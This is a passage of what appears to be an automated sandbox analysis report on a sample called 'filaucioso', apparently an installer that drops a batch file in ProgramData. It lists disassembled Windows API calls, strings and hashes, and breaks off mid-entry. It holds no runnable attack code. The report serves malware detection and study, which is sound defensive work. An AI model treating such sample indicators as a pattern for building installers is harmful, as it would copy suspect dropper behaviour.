                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                        • String ID: %s=%s$[Rename]
                                                                        • API String ID: 2171350718-1727408572
                                                                        • Opcode ID: 57b324a61c57413be18c754cd008fd5a6ce2658ac10cbe97ee3ee47279fdbbb4
                                                                        • Instruction ID: 4ef5f1c50d251b73862b961a89edc9b2cc60572935cd21a4370a6936b8511f12
                                                                        • Opcode Fuzzy Hash: 57b324a61c57413be18c754cd008fd5a6ce2658ac10cbe97ee3ee47279fdbbb4
                                                                        • Instruction Fuzzy Hash: 5231F231201B15ABD2206B659D4DF6B3A6CDF86754F14053FFA01F62D2EA3CE8058EAD
                                                                        APIs
                                                                        • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402CF8
                                                                        • MulDiv.KERNEL32(00515332,00000064,00515336), ref: 00402D23
                                                                        • wsprintfA.USER32 ref: 00402D33
                                                                        • SetWindowTextA.USER32(?,?), ref: 00402D43
                                                                        • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402D55
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                                        • String ID: 2SQ$6SQ$verifying installer: %d%%
                                                                        • API String ID: 1451636040-2546640263
                                                                        • Opcode ID: d2fd7c2642e66b568f2ec6ad1d9ac2acf8620bf8fd7d34c9c6364c2149bd0d5f
                                                                        • Instruction ID: 93681796157c975abd13c8aaf7f83402805495348c169d35143c581ed88c076c
                                                                        • Opcode Fuzzy Hash: d2fd7c2642e66b568f2ec6ad1d9ac2acf8620bf8fd7d34c9c6364c2149bd0d5f
                                                                        • Instruction Fuzzy Hash: 3001FF71640209BBEF109F60DE4AFEE3769EB04345F00803AFA16B51D0DBB999568F59
                                                                        APIs
                                                                        • GlobalFree.KERNEL32(00000000), ref: 6E3A2447
                                                                          • Part of subcall function 6E3A1224: lstrcpynA.KERNEL32(00000000,?,6E3A12CF,-6E3A404B,6E3A11AB,-000000A0), ref: 6E3A1234
                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 6E3A23C2
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 6E3A23D7
                                                                        • GlobalAlloc.KERNEL32(00000040,00000010), ref: 6E3A23E8
                                                                        • CLSIDFromString.OLE32(00000000,00000000), ref: 6E3A23F6
                                                                        • GlobalFree.KERNEL32(00000000), ref: 6E3A23FD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2063049847.000000006E3A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E3A0000, based on PE: true
                                                                        • Associated: 00000001.00000002.2063032692.000000006E3A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2063063793.000000006E3A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2063077518.000000006E3A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_6e3a0000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                                        • String ID: @Hmu
                                                                        • API String ID: 3730416702-887474944
                                                                        • Opcode ID: 8297d4534411aea4dd6b0dc584a722b48824cd5922b561ffcb29be22b1b798e0
                                                                        • Instruction ID: d55e64dd08150b7c6872f3f8a74956a73d33286ca8f9e75bea93882b4425e772
                                                                        • Opcode Fuzzy Hash: 8297d4534411aea4dd6b0dc584a722b48824cd5922b561ffcb29be22b1b798e0
                                                                        • Instruction Fuzzy Hash: 3A417AB1508701DFE710CFAE8A44A6AB7ECFB42311F10885EE696C7190DB70D9C5CB62
                                                                        APIs
                                                                        • CharNextA.USER32(?,*?|<>/":,00000000,"C:\ProgramData\filaucioso.bat" ,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,00403223,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040345A,?,00000006,00000008,0000000A), ref: 004062AF
                                                                        • CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004062BC
                                                                        • CharNextA.USER32(?,"C:\ProgramData\filaucioso.bat" ,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,00403223,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040345A,?,00000006,00000008,0000000A), ref: 004062C1
                                                                        • CharPrevA.USER32(?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,00403223,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040345A,?,00000006,00000008,0000000A), ref: 004062D1
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00406258
                                                                        • "C:\ProgramData\filaucioso.bat" , xrefs: 00406293
                                                                        • *?|<>/":, xrefs: 0040629F
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: Char$Next$Prev
                                                                        • String ID: "C:\ProgramData\filaucioso.bat" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                        • API String ID: 589700163-3507352371
                                                                        • Opcode ID: a4ab23b94a56fbb4e4ab915d6a0181bd243ee2e30b5e95404a857257d08c8b81
                                                                        • Instruction ID: c458f316ef597d28f2da60d7b579c442bef5f501f0b3efb69703b1c7b5c33328
                                                                        • Opcode Fuzzy Hash: a4ab23b94a56fbb4e4ab915d6a0181bd243ee2e30b5e95404a857257d08c8b81
                                                                        • Instruction Fuzzy Hash: 2211E25180479129FB3226280C44FB77F984B9B770F1901BFD4C6722C2C67C5CA6826D
                                                                        APIs
                                                                        • GetWindowLongA.USER32(?,000000EB), ref: 004040FF
                                                                        • GetSysColor.USER32(00000000), ref: 0040413D
                                                                        • SetTextColor.GDI32(?,00000000), ref: 00404149
                                                                        • SetBkMode.GDI32(?,?), ref: 00404155
                                                                        • GetSysColor.USER32(?), ref: 00404168
                                                                        • SetBkColor.GDI32(?,?), ref: 00404178
                                                                        • DeleteObject.GDI32(?), ref: 00404192
                                                                        • CreateBrushIndirect.GDI32(?), ref: 0040419C
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                        • String ID:
                                                                        • API String ID: 2320649405-0
                                                                        • Opcode ID: 2fd397ab70c88e7053abfa2b1889d7e6adf273714bf8f91ffd366fbe1d5efa4b
                                                                        • Instruction ID: 7e7a0635a9a9ad053635d0a61e184563e53fd5caf941e55c08cb8fd0a55be6c0
                                                                        • Opcode Fuzzy Hash: 2fd397ab70c88e7053abfa2b1889d7e6adf273714bf8f91ffd366fbe1d5efa4b
                                                                        • Instruction Fuzzy Hash: 312195715007049BD7309F68DD0CB5BBBF4AF91710B048A2EEA96A62E4C738D894CB54
                                                                        APIs
                                                                          • Part of subcall function 6E3A1215: GlobalAlloc.KERNEL32(00000040,6E3A1233,?,6E3A12CF,-6E3A404B,6E3A11AB,-000000A0), ref: 6E3A121D
                                                                        • GlobalFree.KERNEL32(?), ref: 6E3A25DE
                                                                        • GlobalFree.KERNEL32(00000000), ref: 6E3A2618
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2063049847.000000006E3A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E3A0000, based on PE: true
                                                                        • Associated: 00000001.00000002.2063032692.000000006E3A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2063063793.000000006E3A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2063077518.000000006E3A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_6e3a0000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: Global$Free$Alloc
                                                                        • String ID:
                                                                        • API String ID: 1780285237-0
                                                                        • Opcode ID: c87a78d3e48ead92c4bb9dc58c6657f1ae3390e94cf8687acbeb49cd467b5b29
                                                                        • Instruction ID: baa8063c97db8cb68bf47642c856ced13cbe2fd194d12533e2a27f0bf3ea4a9c
                                                                        • Opcode Fuzzy Hash: c87a78d3e48ead92c4bb9dc58c6657f1ae3390e94cf8687acbeb49cd467b5b29
                                                                        • Instruction Fuzzy Hash: 2C419F71508601EFC705DF9ECD98C6EB7BEFB86304B114969F64187210EB319989DB72
                                                                        APIs
                                                                        • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004049E9
                                                                        • GetMessagePos.USER32 ref: 004049F1
                                                                        • ScreenToClient.USER32(?,?), ref: 00404A0B
                                                                        • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404A1D
                                                                        • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404A43
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: Message$Send$ClientScreen
                                                                        • String ID: f
                                                                        • API String ID: 41195575-1993550816
                                                                        • Opcode ID: b233b2991907e98a40282691d164461162982266b543cde43f51771bab81e11a
                                                                        • Instruction ID: eb4189dc51e804bfd071b7650a20f4023a9ce92a25ebde304762d3f5d63b5794
                                                                        • Opcode Fuzzy Hash: b233b2991907e98a40282691d164461162982266b543cde43f51771bab81e11a
                                                                        • Instruction Fuzzy Hash: A7019271E40218BADB00DB94DD81FFEBBBCAF55711F10012BBA00B61C0C7B455018F94
                                                                        APIs
                                                                        • CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040561D
                                                                        • GetLastError.KERNEL32 ref: 00405631
                                                                        • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405646
                                                                        • GetLastError.KERNEL32 ref: 00405650
                                                                        Strings
                                                                        • C:\ProgramData, xrefs: 004055DA
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405600
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                        • String ID: C:\ProgramData$C:\Users\user\AppData\Local\Temp\
                                                                        • API String ID: 3449924974-2792361600
                                                                        • Opcode ID: 3f07113bbed92aa299f899006a5ac68722d9e9d13463f273e10feef126da3ab7
                                                                        • Instruction ID: 74ab278e8dc0014e3bb1a2534afc1f4e11ab1799ac02ec3fccaeb9b03a53458b
                                                                        • Opcode Fuzzy Hash: 3f07113bbed92aa299f899006a5ac68722d9e9d13463f273e10feef126da3ab7
                                                                        • Instruction Fuzzy Hash: 42011A71C00619EADF009FA1D944BEFBBB8EF14354F00843AD549B6290D77996498FA9
                                                                        APIs
                                                                        • GlobalAlloc.KERNEL32(00000040,00042C00,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027F7
                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402813
                                                                        • GlobalFree.KERNEL32(?), ref: 0040284C
                                                                        • GlobalFree.KERNEL32(00000000), ref: 0040285F
                                                                        • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402877
                                                                        • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040288B
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                        • String ID:
                                                                        • API String ID: 2667972263-0
                                                                        • Opcode ID: 0982fd8cd03af43de4d89f950c9e5981b86a3d1c62601019d2fd9277b0c3e0b0
                                                                        • Instruction ID: 0817f1a76f2754a18340a64afdb33fa8ea80ebf39b88600e0ebdbe9b4451bd6d
                                                                        • Opcode Fuzzy Hash: 0982fd8cd03af43de4d89f950c9e5981b86a3d1c62601019d2fd9277b0c3e0b0
                                                                        • Instruction Fuzzy Hash: C3217C71C00124ABDF217FA9CD49DAE7F79EF09364B10823AF520762E1CA7959429F98
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2063049847.000000006E3A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E3A0000, based on PE: true
                                                                        • Associated: 00000001.00000002.2063032692.000000006E3A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2063063793.000000006E3A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2063077518.000000006E3A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_6e3a0000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: FreeGlobal
                                                                        • String ID:
                                                                        • API String ID: 2979337801-0
                                                                        • Opcode ID: a408ea2393579430a97b9018633cbfef1019ab1a6dba7bfd5f8e17b1a668dc5f
                                                                        • Instruction ID: 0fc0eceb0018dc6850df8675183d0508cc874ecbf7f277a06c21e5ca1b00867b
                                                                        • Opcode Fuzzy Hash: a408ea2393579430a97b9018633cbfef1019ab1a6dba7bfd5f8e17b1a668dc5f
                                                                        • Instruction Fuzzy Hash: BC5123F2D44159AEDB608FEDC844AAEBBBDEB42345F0404AED754A3100C7329ACDC7A1
                                                                        APIs
                                                                        • GetDlgItem.USER32(?), ref: 00401D58
                                                                        • GetClientRect.USER32(?,?), ref: 00401D9F
                                                                        • LoadImageA.USER32(?,?,?,?,?,?), ref: 00401DCD
                                                                        • SendMessageA.USER32(?,00000172,?,00000000), ref: 00401DDD
                                                                        • DeleteObject.GDI32(00000000), ref: 00401DF4
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                        • String ID:
                                                                        • API String ID: 1849352358-0
                                                                        • Opcode ID: 88d48bc7c248e4eb933a40af9007253b2681f99ee098487d3ae5cbff534abad4
                                                                        • Instruction ID: 73b34c0ea56e2209ca6b10ab4d69fe2665be34d6bb8fccc5b8c3de89ec824b9e
                                                                        • Opcode Fuzzy Hash: 88d48bc7c248e4eb933a40af9007253b2681f99ee098487d3ae5cbff534abad4
                                                                        • Instruction Fuzzy Hash: E8216672D00109AFDB05DF98DE44AEE7BB5FB48300F10407AF945F62A1CB789941CB58
                                                                        APIs
                                                                        • GetDC.USER32(?), ref: 00401E02
                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E1C
                                                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00401E24
                                                                        • ReleaseDC.USER32(?,00000000), ref: 00401E35
                                                                        • CreateFontIndirectA.GDI32(0040B7E8), ref: 00401E84
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029945976.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.000000000077B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000780000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000785000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.0000000000787000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2029959804.00000000007B4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000001.00000002.2030242815.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: CapsCreateDeviceFontIndirectRelease
                                                                        • String ID:
                                                                        • API String ID: 3808545654-0
                                                                        • Opcode ID: b39b666d990ace2a16a916a5a91e1be4de7d18ca3c58e3893634c66a591c9fc3
                                                                        • Instruction ID: 7256709fe02f9cd86de6692cc41f874bddf10922414536e302f1c0253df40f98
                                                                        • Opcode Fuzzy Hash: b39b666d990ace2a16a916a5a91e1be4de7d18ca3c58e3893634c66a591c9fc3
                                                                        • Instruction Fuzzy Hash: 3901B571900342AFE7019BB1AE49B997FB4EB55304F104439F251BB1E3CBB800059B6D
                                                                        APIs
                                                                        • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7A
                                                                        • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C92
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2029931751.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000001.00000002.2029919242.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
